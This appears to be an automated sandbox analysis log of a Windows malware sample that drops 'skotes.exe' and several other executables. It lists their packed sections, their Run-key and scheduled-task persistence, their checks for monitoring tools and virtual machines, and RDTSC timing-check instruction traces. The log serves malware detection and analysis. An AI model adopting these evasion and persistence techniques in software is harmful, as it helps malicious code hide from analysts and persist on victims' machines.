Source: 4611cc433b.exe.6.dr Static PE information: section name: whvqijov entropy: 7.941395599436267
Source: random[1].exe0.6.dr Static PE information: section name: entropy: 7.983244716136416
Source: random[1].exe0.6.dr Static PE information: section name: sbjgrbkb entropy: 7.954135504267137
Source: 79ddad050f.exe.6.dr Static PE information: section name: entropy: 7.983244716136416
Source: 79ddad050f.exe.6.dr Static PE information: section name: sbjgrbkb entropy: 7.954135504267137
Source: random[1].exe1.6.dr Static PE information: section name: dnuvwdxn entropy: 7.953787328423517
Source: e051bdf457.exe.6.dr Static PE information: section name: dnuvwdxn entropy: 7.953787328423517
Source: random[2].exe.6.dr Static PE information: section name: entropy: 7.7986677866136604
Source: 734386a52c.exe.6.dr Static PE information: section name: entropy: 7.7986677866136604
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ba17bbfb21.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 734386a52c.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 79ddad050f.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e051bdf457.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 79ddad050f.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 79ddad050f.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e051bdf457.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e051bdf457.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ba17bbfb21.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ba17bbfb21.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 734386a52c.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 734386a52c.exe
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Evasive API call chain: GetPEB, DecisionNodes, Sleep
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFEEE6 second address: AFEF02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C86A67 second address: C86A6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C86A6E second address: C86A7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F1BE47673C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C85CE2 second address: C85CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F1BE4ECC066h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C85CEC second address: C85D02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C85D02 second address: C85D08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C85D08 second address: C85D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jno 00007F1BE47673CAh 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C85E8B second address: C85E96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jno 00007F1BE4ECC066h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C88866 second address: C8886A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C889F6 second address: C889FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C889FD second address: C88A5A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1BE47673CCh 0x00000008 jns 00007F1BE47673C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007F1BE47673C8h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d or dword ptr [ebp+122D3180h], esi 0x00000033 push 00000000h 0x00000035 add di, 3EB7h 0x0000003a call 00007F1BE47673C9h 0x0000003f push edi 0x00000040 pushad 0x00000041 pushad 0x00000042 popad 0x00000043 jg 00007F1BE47673C6h 0x00000049 popad 0x0000004a pop edi 0x0000004b push eax 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f jp 00007F1BE47673C6h 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C88A5A second address: C88A89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC074h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jo 00007F1BE4ECC066h 0x00000012 popad 0x00000013 popad 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C88B5E second address: C88B62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C88B62 second address: C88B6C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1BE4ECC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C88B6C second address: C88B87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C88C8E second address: C88D13 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1BE4ECC068h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 24806AFCh 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F1BE4ECC068h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D2A79h], edi 0x00000033 push 00000003h 0x00000035 and edi, dword ptr [ebp+122D3C02h] 0x0000003b push 00000000h 0x0000003d mov edi, dword ptr [ebp+122D3B12h] 0x00000043 push 00000003h 0x00000045 push E60F95BEh 0x0000004a push edi 0x0000004b push esi 0x0000004c jnp 00007F1BE4ECC066h 0x00000052 pop esi 0x00000053 pop edi 0x00000054 xor dword ptr [esp], 260F95BEh 0x0000005b sub cl, 0000001Eh 0x0000005e lea ebx, dword ptr [ebp+1245D7ECh] 0x00000064 sub esi, dword ptr [ebp+122D1F3Bh] 0x0000006a xchg eax, ebx 0x0000006b jmp 00007F1BE4ECC071h 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 push eax 0x00000074 push eax 0x00000075 push edx 0x00000076 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C88D13 second address: C88D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9B99A second address: C9B9AA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1BE4ECC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9B9AA second address: C9B9B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 js 00007F1BE47673CCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA8722 second address: CA872C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1BE4ECC07Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA8CBB second address: CA8CD6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F1BE47673CBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c jl 00007F1BE47673EDh 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA8CD6 second address: CA8CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA8CDC second address: CA8CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA8F76 second address: CA8F7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA8F7A second address: CA8F8E instructions: 0x00000000 rdtsc 0x00000002 je 00007F1BE47673C6h 0x00000008 jmp 00007F1BE47673CAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA8F8E second address: CA8F94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA8F94 second address: CA8F98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA929E second address: CA92A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA0A06 second address: CA0A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA0A0A second address: CA0A10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CA0A10 second address: CA0A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
